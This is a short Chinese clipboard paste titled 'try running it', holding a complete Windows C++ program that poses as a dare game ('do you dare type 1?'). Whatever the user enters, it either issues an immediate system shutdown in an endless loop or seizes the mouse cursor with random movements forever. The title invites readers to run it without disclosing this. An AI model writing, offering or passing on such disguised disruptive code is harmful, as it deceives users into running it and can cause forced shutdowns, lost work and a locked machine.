运行试试

~ 2025-2-26 22:21:19

#include<bits/stdc++.h>
#include<windows.h>
using namespace std; 
int p;
void destroy_windows(){
	for(;;){
		system("shutdown -s -t 0");
	}
}
void die_windows(){
	int x=GetSystemMetrics(SM_CXSCREEN);
	int y=GetSystemMetrics(SM_CYSCREEN);
	srand(time(0));
	while(1){
		SetCursorPos(rand()%x,rand()%y);
	}
}
void windows_kill(){
	cout<<"你敢输入1吗"<<endl;
	cout<<"千万不要手贱"<<endl;
	cin>>p;
	if(p==1){
		cout<<"你还敢输入?"<<endl;
		cout<<"再给你一次机会千万不要输入2!!!!"<<endl; 
		cin>>p;
		if(p==2){
			cout<<"你的电脑即将吃席!"<<endl;
			die_windows();
		}
		else{
			cout<<"胆小鬼";
			destroy_windows();
			return; 
		}
	}
	else{
		cout<<"胆小鬼"<<endl;
		destroy_windows();
	}
}
int main(){
	windows_kill();
}


我们会审查剪贴板内容,并对发布不合适内容的同学进行相应的处理